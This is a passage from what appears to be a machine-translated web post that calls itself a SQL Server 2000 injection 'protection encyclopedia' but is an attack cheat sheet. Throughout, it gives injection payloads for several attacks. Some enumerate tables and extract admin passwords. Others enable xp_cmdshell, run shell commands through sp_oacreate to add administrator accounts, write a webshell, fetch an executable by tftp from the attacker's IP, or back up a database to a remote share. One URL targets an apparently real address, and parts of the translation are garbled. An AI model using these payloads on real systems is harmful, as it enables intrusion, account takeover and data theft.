SQL Server 2000 Injection Protection Encyclopedia (i)

Server

SQL Server 2000 Injection Protection Encyclopedia (i)

SQL injection early from ' or ' 1 ' = ' 1

Most important table name:

SELECT * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
Systypes
sysusers
sysdatabases
sysxlogins
sysprocesses

Some of the most important user names (existing in the default SQL database)

Public
Dbo
Guest (generally prohibited, or not authorized)
Db_sercurityadmin
Ab_dlladmin

Some default extensions

Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumkeys
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite
Xp_availablemedia Drive Related
Xp_dirtree Directory
XP_ENUMDSN ODBC connection
Xp_loginconfig Server security Mode information
Xp_makecab Create a compressed volume
Xp_ntsec_enumdomains Domain Information
Xp_terminate_process The terminal process, give a PID

For example:

Sp_addextendedproc ' Xp_webserver ', ' C:\temp\xp_foo.dll '
EXEC xp_webserver
Sp_dropextendedproc ' Xp_webserver '
BCP "SELECT * FROM Test". Foo "Queryout c:\inetpub\wwwroot\runcommand.asp
-c-slocalhost-usa-pfoobar
' GROUP by Users.id has 1=1-
' GROUP by Users.id, Users.username, Users.password, Users.privs have 1=1-
'; Insert into users values (666, ' attacker ', ' foobar ', 0xFFFF)-

Union select top 1 column_name from INFORMATION_SCHEMA. COLUMNS where table_name= ' logintable '-
Union select top 1 column_name from INFORMATION_SCHEMA. COLUMNS where table_name= ' logintable ' where column_name not in (' login_id ')-
Union select top 1 column_name from INFORMATION_SCHEMA. COLUMNS where table_name= ' logintable ' where column_name not in (' login_id ', ' login_name ')-
Union select top 1 login_name from logintable-
Union select top 1 password from logintable where login_name= ' Rahul '--

Construct statement: Query exists xp_cmdshell

' Union SELECT @ @version, 1,1,1--
and 1= (select @ @VERSION)
and ' sa ' = (select System_user)
' Union Select ret,1,1,1 from foo--
"union Select min (username), 1,1,1 from users where username > ' A '-
' union Select min (usern AME), 1,1,1 from users where username > ' admin '-
' union select password,1,1,1 from users where username = ' admin '-
and user_name () = ' dbo '
and 0<> (select USER_NAME ()-
; DECLARE @shell INT exec sp_oacreate ' Wscript.Shell ', @shell OUTPUT exec sp_oamethod @shell, ' run ', NULL, ' C:\WINNT\system32 \cmd.exe/c net user swap 5245886/add '
and 1= (select COUNT (*) from master.dbo.sysobjects where
Xtype = ' X ' and Nam E = ' xp_cmdshell ')
; EXEC master.dbo.sp_addextendedproc ' xp_cmdshell ', ' Xplog70.dll '

1 = (%20select%20count (*)%20from%20master.dbo.sysobjects%20where%20xtype= ' x '%20and%20name= ' xp_cmdshell ')
and 1= (select Is_srvrolemember (' sysadmin ')) determines whether the SA permission
and 0<> (select top 1 paths from newtable)--Bauku Dafa
and 1= (select name from master.dbo.sysdatabases where dbid=7) obtains the library name (from 1 to 5 are system id,6 above can be judged)

Create a virtual directory E disk:

DECLARE @o int exec sp_oacreate ' Wscript.Shell ', @o out exec sp_OAMethod @o, ' run ', NULL, ' cscript.exe c:\inetpub\wwwroot\ Mkwebdir.vbs-w "Default Web Site"-V "E", "E:\"
Access properties: (with writing a webshell)
DECLARE @o int exec sp_oacreate ' Wscript.Shell ', @o out exec sp_OAMethod @o, ' run ', NULL, ' cscript.exe c:\inetpub\wwwroot\ Chaccess.vbs-a w3svc/1/root/e +browse '

and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid = 7,8,9 in turn .... Get more database names
and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype= ' U ') bursts into a table assumed to be admin

and 0<> (select top 1 name from bbs.dbo.sysobjects where Xtype= ' U "and name Not in (' Admin ')) to get the other tables.
and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where xtype= ' U ' and name= ' admin '
and uid> (str (ID)) The number of bursts to the UID is assumed to be 18779569 Uid=id
and 0<> (select top 1 name from Bbs.dbo.syscolumns where id=18779569) gets a field from admin, assuming user_id
and 0<> (select top 1 name from Bbs.dbo.syscolumns where id=18779569 and name does not
(' ID ',...)) To storm out the other fields.
and 0< (select user_id from BBS.dbo.admin where username>1)

You can get the user name in order to get the password .... Suppose there are fields such as user_id username, password, etc.

Show.asp?id=-1 Union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
Show.asp?id=-1 Union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin

(The Union statement is popular everywhere, and access works well.)

Bauku Special tips::%5c= ' or '/and ' modify%5 submit

and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype= ' U ') gets the table name
and 0<> (select top 1 name from bbs.dbo.sysobjects where Xtype= ' U "and name not in (' address '))
and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where xtype= ' U ' and name= ' admin ' and uid> (str (ID)) to determine the ID value
and 0<> (select top 1 name from BBS.dbo.syscolumns where id=773577794) all fields

_blank>http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo]. [Swap] ([Swappass][char] (255));--

_blank>http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap) =1
Create TABLE newtable (id int IDENTITY (1,1), paths varchar) Declare @test varchar () exec master. Xp_regread @rootkey = ' hkey_local_machine ', @key = ' system\currentcontrolset\services\w3svc\parameters\virtual Roots\ ', @value_name = '/', values= @test OUTPUT insert INTO paths (path) values (@test)

_blank>http://61.131.96.39/pageshow.asp? Tianname= Policy and Regulation &infoid={57c4165a-4206-4c0d-a8d2-e70666ee4e08};use%20master;declare%20@s%20%20int;exec%20sp_ Oacreate%20 "Wscript.Shell", @s%20out;exec%20sp_oamethod%20@s, "Run", NULL, "cmd.exe%20/c%20ping%201.1.1.1";--

Get the Web path d:\xxxx, Next:

_blank>http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--
_blank>http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--

The traditional existence of xp_cmdshell testing process:

, exec master ... xp_cmdshell ' dir '
; exec master.dbo.sp_addlogin hax;--
; exec master.dbo.sp_password null,hax,hax;--
; exec Master.dbo.sp_addsrvrolemember hax sysadmin;--
exec master.dbo.xp_cmdshell ' net user Hax 5258/workstations:*/ Times:all/passwordchg:yes/passwordreq:yes/active:yes/add ';--
; exec master.dbo.xp_cmdshell ' net localgroup Administrators Hax/add ';--
exec master. Xp_servicecontrol ' start ', ' Schedule '
exec master. Xp_servicecontrol ' start ', ' Server '
http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT exec sp_oacreate ' Wscript.Shell ', @shell OUTPUT exec sp_oamethod @shell, ' run ', NULL, ' C:\WINNT\system32 \cmd.exe/c net user swap 5258/add '
;D eclare @shell INT exec sp_oacreate ' Wscript.Shell ', @shell OUTPUT exec Sp_oameth OD @shell, ' run ', NULL, ' c:\winnt\system32\cmd.exe/c net localgroup Administrators Swap/add '

_blank>http://localhost/show.asp?id=1 '; EXEC master.. xp_cmdshell ' tftp-i youip get file.exe '-

declare @a sysname set @a= ' xp_ ' + ' Cmdshell ' exec @a ' dir c:\ '
declare @a sysname set @a= ' xp ' + ' _cm ' + ' Dshell ' exec @a ' dir c:\ '
;d eclare @a;set @a=db_name (); Backup database @a to disk= ' Your IP your shared directory bak.dat '
If you are limited, you can.
SELECT * FROM OPENROWSET (' SQLOLEDB ', ' server '; Sa '; ', ' select ' ' ok! ' ' exec master.dbo.sp_addlogin Hax ')